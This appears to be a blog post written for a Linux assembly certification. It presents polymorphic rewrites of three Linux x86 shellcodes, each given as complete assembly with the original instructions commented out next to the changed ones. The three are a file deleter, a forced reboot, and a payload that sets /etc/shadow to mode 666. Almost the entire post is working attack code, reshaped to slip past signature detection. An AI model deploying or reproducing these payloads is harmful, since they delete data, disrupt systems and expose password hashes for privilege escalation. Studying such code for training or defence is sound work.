Source: SecurityTube
I recommend check this article Polymorphic Shellcode Engine Using Spectrum Analysis
;26 bytes ;Shellcode : linux/x86 File unlinker 18 bytes + file path length global _start section .text _start: jmp one two pop ebx ;mov al, 0xa ;[ORIGIN] mov al, 0x7 ;[NEW] add al, 0x5 ;[NEW] sub al, 0x2 ;[NEW] int 0x80 mov al, 01 xor ebx, ebx int 0x80 one: call two file: db 0xaa, 0xbb, 0xcc, 0xdd; <- your file hereOriginal here
;46 bytes ;Shellcode Linux x86 PUSH reboot() global _start section .text _start: xor eax, eax push eax ;push 0x746f6f62; toob [ORIGINAL] mov esi, 0x746f6c59 ; [NEW] add si, 0x309 ; [NEW] mov dword [esp-4], esi; [NEW] sub esp, 4 ; [NEW] push 0x65722f6e ; er/n [ORIGINAL] push 0x6962732f; ibs/[ORIGINAL] mov ebx, esp push eax; 0 mov edx, esp push ebx mov ecx, esp mov al, 0xb; [ORIGINAL] mov al, 0x6; [NEW] add al, 0x5; [NEW] 11 = NR_execve int 0x80Original here
;Linux/x86 - chmod() 666 /etc/shadow & exit() ;39 bytes shellcode global _start section .text _start: push ecx mov cx, 0x1b6; = 438 ;push 0x776f6461; woda [ORIGINAL] mov esi, 0x776f6158; [NEW] add si, 0x309 ; woda [NEW] mov dword [esp-4], esi;[NEW] push 0x68732f63; hs/c push 0x74652f2f; te// mov ebx, esp ;save pointer push 0xf ;chmod pop eax ;15 int 0x80 inc eax ;exit int 0x80Original here
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario